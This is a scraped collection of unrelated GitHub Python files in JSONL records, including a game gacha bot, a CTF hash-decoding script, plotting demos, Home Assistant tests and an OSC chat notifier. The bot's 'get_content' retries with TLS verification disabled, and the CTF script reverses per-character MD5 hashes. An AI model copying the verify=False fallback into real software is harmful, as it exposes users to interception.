'news_detail.json')\n\nstatic_path = os.path.join(runtime_path, 'res')\nseal_path = os.path.join(static_path, '海の翁.jpg')\nframe_path = os.path.join(static_path, 'background.png')\nback_path = os.path.join(static_path, 'back.jpg')\nback_cn_path = os.path.join(static_path, 'back_cn.png')\nmask_path = os.path.join(static_path, 'mask.png')\nfont_path = os.path.join(static_path, 'SourceHanSansSC-Regular.otf')\n\ncrt_folder_path = os.path.join(runtime_path, \"crt\")\ncrt_path = \"ca-certificates.crt\"\n\nall_servant_path = os.path.join(data_path, \"all_svt.json\")\nall_command_path = os.path.join(data_path, \"all_cmd.json\")\nall_craft_path = os.path.join(data_path, \"all_cft.json\")\n\nlib_servant_path = os.path.join(data_path, \"lib_svt.json\")\nlib_command_path = os.path.join(data_path, \"lib_cmd.json\")\nlib_craft_path = os.path.join(data_path, \"lib_cft.json\")\n\nall_json = [\n banner_path, config_path, pools_path, gacha_path, lucky_path,\n banner_data_path, update_data_path, old_pools_path,\n news_path, news_detail_path,\n all_servant_path, all_command_path, all_craft_path,\n lib_servant_path, lib_command_path, lib_craft_path\n]\n\n\ndef create_img(text: str) -> str:\n font_size = 30\n padding = 10\n\n font = ImageFont.truetype(font_path, font_size)\n\n 
wit, hei = font.getsize_multiline(text)\n img = Image.new(\"RGB\", (wit + padding * 2, hei + padding * 2), \"white\")\n draw = ImageDraw.Draw(img)\n draw.multiline_text((padding / 2, padding / 2), text, font=font, fill=\"black\")\n\n pic = util.pic2b64(img)\n msg = str(MessageSegment.image(pic))\n return msg\n\n\ndef gen_node(text: Union[str, List[str]], _name: str = \"涩茄子\", _uin: str = \"2902388901\") -> dict:\n node = {\n \"type\": \"node\",\n \"data\": {\n \"name\": _name,\n \"uin\": _uin,\n \"content\": text\n }\n }\n\n return node\n\n\ndef load_config(ev: CQEvent, get_group: bool = False) -> dict:\n gid = str(ev.group_id)\n if os.path.exists(config_path):\n try:\n configs = json.load(open(config_path, encoding=\"utf-8\"))\n if gid not in configs[\"groups\"]:\n basic_config = {\n \"crt_path\": crt_path,\n \"style\": \"图片\"\n }\n configs[\"groups\"][gid] = basic_config\n with open(config_path, \"w\", encoding=\"utf-8\") as f:\n f.write(json.dumps(configs, indent=2, ensure_ascii=False))\n\n if get_group:\n if gid in configs[\"groups\"]:\n return configs[\"groups\"][gid]\n else:\n return configs\n except json.decoder.JSONDecodeError:\n pass\n\n basic_config = {\n \"crt_path\": crt_path,\n \"style\": \"图片\"\n }\n configs = {\n \"follow_latest\": True,\n \"flush_hour\": 0,\n \"flush_minute\": 60,\n \"flush_second\": 0,\n \"groups\": {\n gid: basic_config\n }\n }\n with open(config_path, \"w\", encoding=\"utf-8\") as f:\n f.write(json.dumps(configs, indent=2, ensure_ascii=False))\n\n if get_group:\n return basic_config\n else:\n return configs\n\n\nasync def getpic(url: str, img_path: str) -> bool:\n if os.path.exists(img_path):\n return True\n async with async_playwright() as p:\n browser = await p.chromium.launch()\n page = await browser.new_page()\n try:\n await page.goto(url)\n except Exception as e:\n sv.logger.error(f\"访问网站超时{type(e)}\\n`{e}`\")\n return False\n await asyncio.sleep(1)\n sv.logger.info(\"正在保存图片...\")\n await page.screenshot(\n path=img_path,\n full_page=True\n )\n sv.logger.info(\"正在压缩图片...\")\n img_convert = Image.open(img_path)\n img_convert.save(img_path, quality=70)\n sv.logger.info(\"图片保存成功!\")\n await browser.close()\n return True\n\n\ndef gen_ms_img(image: Union[bytes, Image.Image]) -> MessageSegment:\n if isinstance(image, bytes):\n return MessageSegment.image(\n util.pic2b64(Image.open(io.BytesIO(image)))\n )\n else:\n return MessageSegment.image(\n util.pic2b64(image)\n )\n\n\nasync def gen_img_from_url(img_url: str, crt_file: Union[bool, str]) -> Union[Exception, MessageSegment]:\n img_url = f\"https://fgo.wiki{img_url}\"\n image_bytes = await get_content(img_url, crt_file)\n if isinstance(image_bytes, Exception):\n return image_bytes\n return gen_ms_img(image_bytes)\n\n\nasync def get_content(url: str, crt_file: Union[bool, str]) -> Union[Exception, bytes]:\n try:\n return await (\n await aiorequests.get(url, timeout=20, headers=headers, verify=crt_file)\n ).content\n except OSError:\n return await (\n await aiorequests.get(url, timeout=20, verify=False, headers=headers)\n ).content\n except Exception as e:\n logger.error(f\"aiorequest error: {e}\")\n return e\n\n\nasync def gen_gacha_img(style: str, img_path: List[str], server: str) -> Image:\n # 文字图标版,更快\n if not style == \"图片\":\n cards = []\n for each in img_path:\n cards.append(Image.open(each).resize((66, 72)))\n rows = 3\n cols = 4\n base_img = Image.open(frame_path).resize(((66 * cols) + 40, (72 * rows) + 40))\n r_counter = 0\n c_counter = 0\n for each in cards:\n base_img.paste(each, ((66 * 
c_counter) + 20, (72 * r_counter) + 20))\n c_counter += 1\n if c_counter >= cols:\n r_counter += 1\n if r_counter >= rows:\n break\n else:\n c_counter = 0\n\n else:\n # 图片版,较慢\n if server == \"国服\":\n base_img = Image.open(back_cn_path).convert(\"RGBA\")\n else:\n base_img = Image.open(back_path).convert(\"RGBA\")\n masker = Image.open(mask_path).resize((width, height))\n\n for i, pic_path in enumerate(img_path):\n tmp_img = Image.open(pic_path).resize((width, height))\n tmp_img = tmp_img.convert('RGBA')\n base_img.paste(tmp_img, box_list[i], mask=masker)\n\n return base_img\n","repo_name":"kcn3388/fgogacha","sub_path":"path_and_json.py","file_name":"path_and_json.py","file_ext":"py","file_size_in_byte":14060,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"52"} +{"seq_id":"19691785826","text":"'''\n\tCreated by: Sukma Setyaji\n\tTime created: 2017-07-02 09:55\n\tthanks for solution and inspiration from:\n\t[1] https://github.com/HackThisCode/CTF-Writeups/blob/master/2017/EasyCTF/Hash%20On%20Hash/README.md\n\t[2] https://stackoverflow.com/questions/11555468/how-should-i-read-a-file-line-by-line-in-python\n'''\n\nimport hashlib\nhashdict = []\ndecoded = \"\"\n\nfor i in range(255):\n\thashdict.append(hashlib.md5(chr(i)).hexdigest())\n\nwith open('hashedtext.txt') as fp:\n for line in fp:\n for iterate in range(len(hashdict)):\n \tif line.strip() == hashdict[iterate]:\n \t\tdecoded += chr(iterate)\n \t\t\nf = open('decodedtext.txt','w')\nf.write(decoded)\n","repo_name":"suksest/ctf-tools","sub_path":"crypto/md5_hex_to_str.py","file_name":"md5_hex_to_str.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74938295204","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 12 15:39:05 2019\n\n@author: 10060638(heartofrevel)\n\"\"\"\n\nimport win32com.client\nimport docx2txt\n\n\ndef read_doc_file(doc_file_path):\n try:\n word = win32com.client.Dispatch(\"Word.Application\")\n word.visible = False\n word.Documents.Open(doc_file_path)\n doc = word.ActiveDocument\n return doc.Range().Text\n except Exception as e:\n print(\"Error reading the doc file : \"+str(e))\n finally:\n word.Application.Quit(-1)\n \n\ndef read_docx_file(docx_file_path):\n try:\n result = docx2txt.process(docx_file_path)\n return result\n except Exception as e:\n print(\"Error reading docx file : \"+str(e))\n \n ","repo_name":"heartofrevel/DataRevellers","sub_path":"Utilities/Readers.py","file_name":"Readers.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"11869564329","text":"from time import sleep\n\nfrom PIL import Image\n\nfrom pitop import Pitop\n\npitop = Pitop()\nminiscreen = pitop.miniscreen\n\nimage = Image.open(\"/usr/lib/python3/dist-packages/pitop/miniscreen/images/rocket.gif\")\n\n# Run animation loop in background by setting `background` to True\nminiscreen.play_animated_image(image, background=True, loop=True)\n\n\n# Do stuff while showing image\nprint(\"Counting to 100 while showing animated image on miniscreen...\")\n\nfor i in range(100):\n print(\"\\r{}\".format(i), end=\"\", flush=True)\n sleep(0.2)\n\nprint(\"\\rFinished!\")\n\n# Stop 
animation\nminiscreen.stop_animated_image()\n","repo_name":"thymjan/pi-top-Python-SDK","sub_path":"examples/system/miniscreen/miniscreen_display_animated_image_loop_in_background.py","file_name":"miniscreen_display_animated_image_loop_in_background.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"30909658891","text":"def add (a, b):\n\treturn a+b\nprint (add (1, 4))\n\nmyList=[1,7,9,3,1,2,8]\nseen = []\nfor number in myList:\n if number in seen:\n print (\"Number repeated!\")\n else:\n seen.append(number)\nprint (\"Hello World\")\n#these functions are not used\n","repo_name":"A3ex1984/hello_world","sub_path":"add.py","file_name":"add.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8944100564","text":"# -*- coding: utf-8 -*-\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n# set the style and load the dataset\nsns.set(style=\"ticks\", color_codes=True)\ntips = sns.load_dataset(\"tips\")\ndiamonds = sns.load_dataset(\"diamonds\")\n\n# a simple example of boxplot\n# sns.catplot(x=\"day\", y=\"total_bill\", kind=\"box\", data=tips)\n\n# add a hue semantic\n# sns.catplot(x=\"day\", y=\"total_bill\", hue=\"smoker\", kind=\"box\", data=tips)\n\n# add additional column (\"weekend\") to provide more information\n# tips[\"weekend\"] = tips[\"day\"].isin([\"Sat\", \"Sun\"])\n# sns.catplot(x=\"day\", y=\"total_bill\", hue=\"weekend\", kind=\"box\", dodge=False, data=tips)\n\n# a related function boxenplot that can provide more information\n# sns.catplot(x=\"color\", y=\"price\", kind=\"boxen\", data=diamonds.sort_values(\"color\"))\n\n# a simple example of violinplot\nsns.catplot(x=\"total_bill\", y=\"day\", kind=\"violin\", data=tips)\n\nplt.show()\n","repo_name":"zhengxiang1994/seabornDemo","sub_path":"distribution_observation.py","file_name":"distribution_observation.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"43197444302","text":"import os\nfrom .aioUAPI import Request as Api\nfrom .progress_bar import ProgressBar\n\n\nclass BaseScraper:\n def __init__(self,\n api: Api,\n categories_to_scraping: list or int or str = 'all',\n template_path: str = f'{os.path.dirname(os.path.abspath(__file__))}/template.html',\n result_dir: str = f'{os.getcwd()}/result',\n remove_after_parse: bool = False,\n create_dir_tree: bool = True,\n delay_rate: float = 1):\n self.api: Api = api\n self.template_path: str = template_path\n self.categories_to_scraping: list or int or str = categories_to_scraping\n self.result_dir: str = result_dir\n self.remove_after_parse: bool = remove_after_parse\n self.create_dir_tree: bool = create_dir_tree\n self.delay_rate: float = delay_rate\n self.progress: ProgressBar = ProgressBar(0)\n self.categories: dict = {}\n\n async def get_categories(self):\n response = await self.api.get('/shop/request', {'page': 'categories'})\n try:\n response = response['success']\n except KeyError:\n print('\\nError getting categories')\n else:\n for item in response:\n self.categories.update(self.categories_update(item))\n\n def categories_update(self, category: dict, local_path: str = '') -> dict:\n categories = {}\n cat_id = int(category['cat_id'])\n local_path = f\"{local_path}/{category['cat_name']}\".replace(':', ' -')\n categories.update({cat_id: {'cat_name': category['cat_name'], 
'cat_url': category['cat_url'],\n 'local_path': local_path, 'goods_count': category['goods_count']}})\n if type(category['childs']) == list:\n for child in category['childs']:\n categories.update(self.categories_update(child, local_path))\n return categories\n\n def find_category(self, cat: str or int) -> dict or None:\n if type(cat) == str:\n return self.find_category_by_url(cat)\n elif type(cat) == int:\n return self.find_category_by_id(cat)\n\n def find_category_by_id(self, cat_id: int) -> dict or None:\n return self.categories.get(cat_id)\n\n def find_category_by_url(self, cat_url: str) -> dict or None:\n for cat in self.categories.values():\n if cat['cat_url'] == cat_url:\n return cat\n return None\n","repo_name":"MatthewAllDev/aio_ucoz_goods_scraper","sub_path":"uAPIscraper/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2482,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"26871998479","text":"\"\"\"add scores\n\nRevision ID: 5c420357e3b3\nRevises: d9f252b4b7b5\nCreate Date: 2023-05-16 21:58:22.830635\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = \"5c420357e3b3\"\ndown_revision = \"d9f252b4b7b5\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table(\n \"training_scores\",\n sa.Column(\"id\", sa.Integer(), nullable=False),\n sa.Column(\"training_id\", sa.Integer(), nullable=False),\n sa.Column(\"author\", sa.Integer(), nullable=False),\n sa.Column(\"score\", sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(\n [\"training_id\"],\n [\"trainings.id\"],\n ),\n sa.PrimaryKeyConstraint(\"id\"),\n )\n with op.batch_alter_table(\"training_scores\", schema=None) as batch_op:\n batch_op.create_index(\n batch_op.f(\"ix_training_scores_id\"), [\"id\"], unique=False\n )\n\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! 
###\n with op.batch_alter_table(\"training_scores\", schema=None) as batch_op:\n batch_op.drop_index(batch_op.f(\"ix_training_scores_id\"))\n\n op.drop_table(\"training_scores\")\n # ### end Alembic commands ###\n","repo_name":"taller2-fiufit/svc-trainings","sub_path":"alembic/versions/5c420357e3b3_add_scores.py","file_name":"5c420357e3b3_add_scores.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31625400459","text":"#!/usr/bin/python\n# python get_py_most_abun.py 200mostAbunOTU_w_counts.txt most_abun_filename.txt\nimport sys\nimport re\nimport glob\n\ndef search(search_term):\n for filename in glob.glob('*.summary'):\n for line in open(filename,'r'):\n if re.search(search_term,line):\n# return line.strip()\n return filename\n\ndef main():\n fread = open(sys.argv[1],'r')\n fwrite = open(sys.argv[2],'w')\n for line in fread:\n seid = line.strip().split('\\t')\n search_term = (\" \"+seid[0]+': ')\n abun = search(search_term)\n fwrite.write(seid[0]+'\\t'+seid[1]+'\\t'+abun+'\\n')\n\nif __name__ == '__main__':\n main()\n","repo_name":"metajinomics/qiime_tools","sub_path":"get_py_most_abun.py","file_name":"get_py_most_abun.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12684419216","text":"import configparser\nimport os\nclass ConfigUtils:\n def __init__(self,config_path):\n self.cfg = configparser.ConfigParser()\n self.cfg.read(config_path, encoding='utf-8')\n\n def read_value(self, section, key):\n value = self.cfg.get(section, key)\n return value\n\n @property# 把方法变为属性方法\n def URL(self):\n url = self.cfg.get('default', 'URL')\n return url\n\n @property\n def CASE_DATA_PATH(self):\n casedatapath = self.cfg.get('path', 'CASE_DATA_PATH')\n return casedatapath\n\n @property\n def LOG_PATH(self):\n log_path = self.cfg.get('path', 'LOG_PATH')\n return log_path\n\n @property\n def LOG_LEVEL(self):\n log_level = int(self.cfg.get('log', 'LOG_LEVEL'))\n return log_level\n\ncurrent_path = os.path.dirname(__file__)\nconfig_path = os.path.join(current_path, '../local_config/config.ini')\nconfigUtils = ConfigUtils(config_path)\n\n# 测试类\nif __name__ == '__main__':\n current_path = os.path.dirname(__file__)\n config_path = os.path.join(current_path, '../local_config/config.ini')\n conf = ConfigUtils(config_path)\n print(conf.read_value('default', 'URL'))\n print(conf.URL)\n print(conf.CASE_DATA_PATH)","repo_name":"nana0908/lucky_pydemo","sub_path":"interface_automation/common/config_utils.py","file_name":"config_utils.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30882734590","text":"from pathlib import Path\r\nfrom random import choice\r\nfrom flask import Flask, render_template, request, redirect, url_for, flash, jsonify, g\r\n\r\napp = Flask(__name__)\r\n\r\n@app.before_first_request\r\ndef get_fonts():\r\n font_dir = Path(__file__).parent.parent / 'fonts'\r\n g.fonts = [f.name for f in font_dir.iterdir() if f.is_file()]\r\n app.logger.info(f'Found {len(g.fonts)} local fonts')\r\n app.logger.debug(f'Fonts: {g.fonts}')\r\n\r\n@app.before_first_request\r\ndef get_images():\r\n image_dir = Path(__file__).parent.parent / 'images'\r\n g.images = [f.name for f in image_dir.iterdir() if f.is_file()]\r\n app.logger.info(f'Found {len(g.images)} local images')\r\n app.logger.debug(f'Images: 
{g.images}')\r\n\r\n@app.route('/')\r\ndef index():\r\n app.logger.debug(g.fonts)\r\n app.logger.debug(g.images)\r\n return 'Hello, World!'","repo_name":"bdunnette/jaas","sub_path":"src/app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19088687740","text":"import copy\nimport sys\n\nmaxInt = sys.maxsize\nminInt = sys.maxsize*-1\n\ndef checkWinner(board):\n for i in range(0,3):\n if board[i][0]=='x' and board[i][1]=='x' and board[i][2]=='x':\n return 1\n if board[i][0]=='o' and board[i][1]=='o' and board[i][2]=='o':\n return -1\n if board[0][i]=='x' and board[1][i]=='x' and board[2][i]=='x':\n return 1\n if board[0][i]=='o' and board[1][i]=='o' and board[2][i]=='o':\n return -1\n \n if board[0][0]=='x' and board[1][1]=='x' and board[2][2]=='x':\n return 1\n elif board[0][2]=='x' and board[1][1]=='x' and board[2][0] == 'x':\n return 1\n elif board[0][2]=='o' and board[1][1]=='o' and board[2][0] == 'o':\n return -1\n elif board[0][0]=='o' and board[1][1]=='o' and board[2][2]=='o':\n return -1\n else: return 0\n \ndef isterminal(board):\n for i in range(0,3):\n for j in range(0,3):\n if(board[i][j]==''):\n return 1\n\n return 0 \n\ndef minimax(board,x,y,depth,ismaximiser):\n if(ismaximiser==True):\n board[x][y] = 'x' #maximizer\n bestmove = {'depth':maxInt,'score':minInt}\n else: \n board[x][y] = 'o' #minimizer\n bestmove = {'depth':maxInt,'score':maxInt}\n\n winner = checkWinner(board)\n if winner!=0:\n bestmove['depth'] = depth\n bestmove['score'] = winner\n return bestmove\n else:\n toContinue = isterminal(board)\n if toContinue==0:\n bestmove['depth'] = depth\n bestmove['score'] = 0\n return bestmove\n if ismaximiser==True: \n for i in range(0,3):\n for j in range(0,3):\n if(board[i][j]==''):\n p = copy.deepcopy(board)\n move = minimax(p,i,j,depth+1,not ismaximiser)\n if move.get('score')>bestmove.get('score'):\n bestmove['depth'] = move.get('depth')\n bestmove['score'] = move.get('score')\n elif move.get('score')==bestmove.get('score') and move.get('depth')bestmove.get('score') or move.get('score')==bestmove.get('score') and move.get('depth')bestmove.get('score') or move.get('score')==bestmove.get('score') and move.get('depth')=3', ]\n\nsetup(\n author=\"Balveer Singh\",\n author_email='balveer@geoiq.io',\n python_requires='>=3.6',\n classifiers=[\n 'Development Status :: 2 - Pre-Alpha',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Natural Language :: English',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n ],\n description=\"Get started with a wide range of location-based features and build ml models using this package\",\n install_requires=requirements,\n license=\"MIT license\",\n long_description=readme + '\\n\\n' + history,\n include_package_data=True,\n keywords='geoiq_automl_us',\n name='geoiq_automl_us',\n packages=find_packages(include=['geoiq_automl_us', 'geoiq_automl_us.*']),\n test_suite='tests',\n tests_require=test_requirements,\n url='https://github.com/geoiq-io/geoiq_automl_us',\n version='0.1.0',\n zip_safe=False,\n)\n","repo_name":"geoiq-io/geoiq_automl_us","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} 
+{"seq_id":"37582367890","text":"\"\"\"Tests for the Hyperion integration.\"\"\"\nfrom unittest.mock import AsyncMock, call, patch\n\nfrom hyperion.const import (\n KEY_COMPONENT,\n KEY_COMPONENTID_ALL,\n KEY_COMPONENTID_BLACKBORDER,\n KEY_COMPONENTID_BOBLIGHTSERVER,\n KEY_COMPONENTID_FORWARDER,\n KEY_COMPONENTID_GRABBER,\n KEY_COMPONENTID_LEDDEVICE,\n KEY_COMPONENTID_SMOOTHING,\n KEY_COMPONENTID_V4L,\n KEY_COMPONENTSTATE,\n KEY_STATE,\n)\n\nfrom homeassistant.components.hyperion.const import COMPONENT_TO_NAME\nfrom homeassistant.components.switch import DOMAIN as SWITCH_DOMAIN\nfrom homeassistant.const import ATTR_ENTITY_ID, SERVICE_TURN_OFF, SERVICE_TURN_ON\nfrom homeassistant.helpers.typing import HomeAssistantType\nfrom homeassistant.util import slugify\n\nfrom . import call_registered_callback, create_mock_client, setup_test_config_entry\n\nTEST_COMPONENTS = [\n {\"enabled\": True, \"name\": \"ALL\"},\n {\"enabled\": True, \"name\": \"SMOOTHING\"},\n {\"enabled\": True, \"name\": \"BLACKBORDER\"},\n {\"enabled\": False, \"name\": \"FORWARDER\"},\n {\"enabled\": False, \"name\": \"BOBLIGHTSERVER\"},\n {\"enabled\": False, \"name\": \"GRABBER\"},\n {\"enabled\": False, \"name\": \"V4L\"},\n {\"enabled\": True, \"name\": \"LEDDEVICE\"},\n]\n\nTEST_SWITCH_COMPONENT_BASE_ENTITY_ID = \"switch.test_instance_1_component\"\nTEST_SWITCH_COMPONENT_ALL_ENTITY_ID = f\"{TEST_SWITCH_COMPONENT_BASE_ENTITY_ID}_all\"\n\n\nasync def test_switch_turn_on_off(hass: HomeAssistantType) -> None:\n \"\"\"Test turning the light on.\"\"\"\n client = create_mock_client()\n client.async_send_set_component = AsyncMock(return_value=True)\n client.components = TEST_COMPONENTS\n\n # Setup component switch.\n with patch(\n \"homeassistant.components.hyperion.switch.HyperionComponentSwitch.entity_registry_enabled_default\"\n ) as enabled_by_default_mock:\n enabled_by_default_mock.return_value = True\n await setup_test_config_entry(hass, hyperion_client=client)\n\n # Verify switch is on (as per TEST_COMPONENTS above).\n entity_state = hass.states.get(TEST_SWITCH_COMPONENT_ALL_ENTITY_ID)\n assert entity_state\n assert entity_state.state == \"on\"\n\n # Turn switch off.\n await hass.services.async_call(\n SWITCH_DOMAIN,\n SERVICE_TURN_OFF,\n {ATTR_ENTITY_ID: TEST_SWITCH_COMPONENT_ALL_ENTITY_ID},\n blocking=True,\n )\n\n # Verify correct parameters are passed to the library.\n assert client.async_send_set_component.call_args == call(\n **{KEY_COMPONENTSTATE: {KEY_COMPONENT: KEY_COMPONENTID_ALL, KEY_STATE: False}}\n )\n\n client.components[0] = {\n \"enabled\": False,\n \"name\": \"ALL\",\n }\n call_registered_callback(client, \"components-update\")\n\n # Verify the switch turns off.\n entity_state = hass.states.get(TEST_SWITCH_COMPONENT_ALL_ENTITY_ID)\n assert entity_state\n assert entity_state.state == \"off\"\n\n # Turn switch on.\n await hass.services.async_call(\n SWITCH_DOMAIN,\n SERVICE_TURN_ON,\n {ATTR_ENTITY_ID: TEST_SWITCH_COMPONENT_ALL_ENTITY_ID},\n blocking=True,\n )\n\n # Verify correct parameters are passed to the library.\n assert client.async_send_set_component.call_args == call(\n **{KEY_COMPONENTSTATE: {KEY_COMPONENT: KEY_COMPONENTID_ALL, KEY_STATE: True}}\n )\n\n client.components[0] = {\n \"enabled\": True,\n \"name\": \"ALL\",\n }\n call_registered_callback(client, \"components-update\")\n\n # Verify the switch turns on.\n entity_state = hass.states.get(TEST_SWITCH_COMPONENT_ALL_ENTITY_ID)\n assert entity_state\n assert entity_state.state == \"on\"\n\n\nasync def test_switch_has_correct_entities(hass: 
HomeAssistantType) -> None:\n \"\"\"Test that the correct switch entities are created.\"\"\"\n client = create_mock_client()\n client.components = TEST_COMPONENTS\n\n # Setup component switch.\n with patch(\n \"homeassistant.components.hyperion.switch.HyperionComponentSwitch.entity_registry_enabled_default\"\n ) as enabled_by_default_mock:\n enabled_by_default_mock.return_value = True\n await setup_test_config_entry(hass, hyperion_client=client)\n\n entity_state = hass.states.get(TEST_SWITCH_COMPONENT_ALL_ENTITY_ID)\n\n for component in (\n KEY_COMPONENTID_ALL,\n KEY_COMPONENTID_SMOOTHING,\n KEY_COMPONENTID_BLACKBORDER,\n KEY_COMPONENTID_FORWARDER,\n KEY_COMPONENTID_BOBLIGHTSERVER,\n KEY_COMPONENTID_GRABBER,\n KEY_COMPONENTID_LEDDEVICE,\n KEY_COMPONENTID_V4L,\n ):\n entity_id = (\n TEST_SWITCH_COMPONENT_BASE_ENTITY_ID\n + \"_\"\n + slugify(COMPONENT_TO_NAME[component])\n )\n entity_state = hass.states.get(entity_id)\n assert entity_state, f\"Couldn't find entity: {entity_id}\"\n","repo_name":"fpetillo/home-assistant","sub_path":"tests/components/hyperion/test_switch.py","file_name":"test_switch.py","file_ext":"py","file_size_in_byte":4726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36213475399","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nSpyder Editor\r\n\r\nThis is a temporary script file.\r\n\"\"\"\r\n# 108021016 林雨璇 2-5 Palindrome.py\r\n\r\nstr = input('請輸入')\r\nstr2 = str[::-1]\r\n\r\nif str == str2:\r\n print('true')\r\nelse:\r\n print('false')\r\n ","repo_name":"vivian1008/109-2_Python","sub_path":"108021016 林雨璇 2-5 Palindrome.py","file_name":"108021016 林雨璇 2-5 Palindrome.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28559951778","text":"from pythonosc import udp_client, dispatcher, osc_server\r\nfrom PyQt5.QtCore import QThread, pyqtSignal, QTimer, pyqtSlot, QMutex\r\nfrom PyQt5.QtWidgets import QWidget\r\nfrom pythonosc.udp_client import SimpleUDPClient\r\n\r\nclass OSCNotifier(QThread):\r\n song_added_signal = pyqtSignal(str)\r\n song_already_in_queue_signal = pyqtSignal(str)\r\n custom_message_signal = pyqtSignal(str)\r\n clear_chat_signal = pyqtSignal()\r\n \r\n def __init__(self, ip=\"127.0.0.1\", port=9000):\r\n super().__init__()\r\n self.client = udp_client.SimpleUDPClient(ip, port)\r\n self.message_queue = []\r\n self.mutex = QMutex() # Lock to synchronize access to message_queue\r\n self.last_song_added = \"\"\r\n self.default_message = f\"Type: \\\"#song name\\\" in front of me to add a song to queue. Last Song: {self.last_song_added}\"\r\n \r\n self.song_added_signal.connect(self.on_song_added)\r\n self.custom_message_signal.connect(self.send_custom_message)\r\n self.clear_chat_signal.connect(self.clear_chat)\r\n \r\n self.timer = QTimer()\r\n self.timer.timeout.connect(self.handle_message_queue)\r\n self.handle_message_queue()\r\n\r\n \r\n @pyqtSlot(str)\r\n def send_custom_message(self, message):\r\n self.mutex.lock()\r\n self.message_queue.append(message)\r\n self.mutex.unlock()\r\n \r\n @pyqtSlot(str)\r\n def on_song_added(self, message):\r\n self.mutex.lock()\r\n self.message_queue.append(message + \" added to queue!\")\r\n self.last_song_added = message\r\n self.default_message = f\"Type: \\\"#song name\\\" in front of me to add a song to queue. 
Last Song: {self.last_song_added}\"\r\n self.mutex.unlock()\r\n print(message + \" added to queue!\")\r\n\r\n def handle_message_queue(self):\r\n if self.message_queue:\r\n self.display_message(self.message_queue.pop(0))\r\n self.timer.start(5000)\r\n else:\r\n self.display_default_message()\r\n self.timer.start(2500)\r\n\r\n def display_default_message(self):\r\n self.display_message(self.default_message)\r\n\r\n def display_message(self, message):\r\n self.client.send_message(\"/chatbox/input\", [message,True,False])\r\n \r\n def clear_chat(self):\r\n self.client.send_message(\"/chatbox/input\", [\"\",True,False])\r\n \r\nclass OSCListener(QThread):\r\n def __init__(self, ip=\"127.0.0.1\", port=9001):\r\n super().__init__()\r\n self._dispatcher = dispatcher.Dispatcher()\r\n self._dispatcher.map(\"/*\", self.print_all)\r\n \r\n self._server = osc_server.ThreadingOSCUDPServer((ip, port), self._dispatcher)\r\n print(\"Serving on {}\".format(self._server.server_address))\r\n \r\n def print_all(self, address, *args):\r\n print(f\"OSC message received on {address} with arguments: {args}\")\r\n\r\n def serve_forever(self):\r\n self._server.serve_forever()\r\n \r\nclass AvatarParameterChanger(QWidget):\r\n def __init__(self):\r\n super().__init__()\r\n self.parameters = {\r\n \"huehair\" : [1.0, 0.43],\r\n \"hueHighlights\" : [1.0, 0.43],\r\n \"huetats\" : [1.0, 0.43],\r\n \"hueclothes1\" : [1.0, 0.43],\r\n \"hueclothes2\" : [1.0, 0.43],\r\n \"hueMetal\" : [1.0, 0.43],\r\n \r\n }\r\n self.client = SimpleUDPClient(\"127.0.0.1\", 9000)\r\n\r\n def temporary_change_parameters(self):\r\n for key, values in self.parameters.items():\r\n self.send_osc_message(key, values[1])\r\n \r\n # Set a timer to reset parameters after duration\r\n QTimer.singleShot(int(2.5 * 1000), self.reset_parameters_to_default)\r\n\r\n def reset_parameters_to_default(self):\r\n for key, values in self.parameters.items():\r\n self.send_osc_message(key, values[0])\r\n\r\n def send_osc_message(self, address: str, value: float):\r\n self.client.send_message(\"/avatar/parameters/\"+address, value)\r\n \r\nif __name__==\"__main__\":\r\n from PyQt5.QtWidgets import QApplication\r\n import sys\r\n app = QApplication(sys.argv)\r\n # listener = OSCListener()\r\n param_changer = AvatarParameterChanger()\r\n param_changer.temporary_change_parameters()\r\n # listener.serve_forever()\r\n app.exec_()\r\n \r\n 